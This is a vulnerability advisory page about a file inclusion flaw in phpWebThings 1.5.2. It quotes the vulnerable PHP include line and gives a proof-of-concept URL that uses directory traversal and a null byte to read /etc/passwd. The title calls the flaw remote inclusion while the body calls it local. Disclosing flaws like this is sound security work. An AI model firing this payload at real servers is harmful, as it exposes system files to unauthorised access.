Lucene search
K

phpWebThings 1.5.2 Remote File Inclusion

🗓️ 11 Jun 2009 00:00:00Reported by Br0lyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 14 Views

phpWebThings 1.5.2 Remote File Inclusion vulnerabilit

Code
`----------------------------------------------------------------------------------------------------  
  
Name : phpwebthings <= 1.5.2  
Site : http://sourceforge.net/projects/phpwebthings/  
  
Down : http://sourceforge.net/project/downloading.php?group_id=19103&filename=phpwebthings_1_5_2.zip&a=46042396  
  
  
----------------------------------------------------------------------------------------------------  
  
  
Found By : br0ly  
Made in : Brasil  
Contact : br0ly[dot]Code[at]gmail[dot]com  
  
----------------------------------------------------------------------------------------------------  
  
  
Description:  
  
Bug : Local File Inclusion  
  
Look this:   
  
<?php theme_draw_centerbox_open("Help");  
if (isset($_GET["module"])) include("modules/{$_GET["module"]}/lang/help_{$cfg["core"]["lang"]}.php"); <-- Vul   
  
else include("lang/help_{$cfg["core"]["lang"]}.php");  
  
  
  
If magic_quotes_gpc=off --> LFI;   
  
  
  
----------------------------------------------------------------------------------------------------  
  
  
P0c:  
  
LFI:http://localhost/Scripts/phpwebthings_1_5_2/help?module=../../../../../../../../../../../../etc/passwd%00  
  
  
  
OBS: need register_globals=on;  
  
----------------------------------------------------------------------------------------------------  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation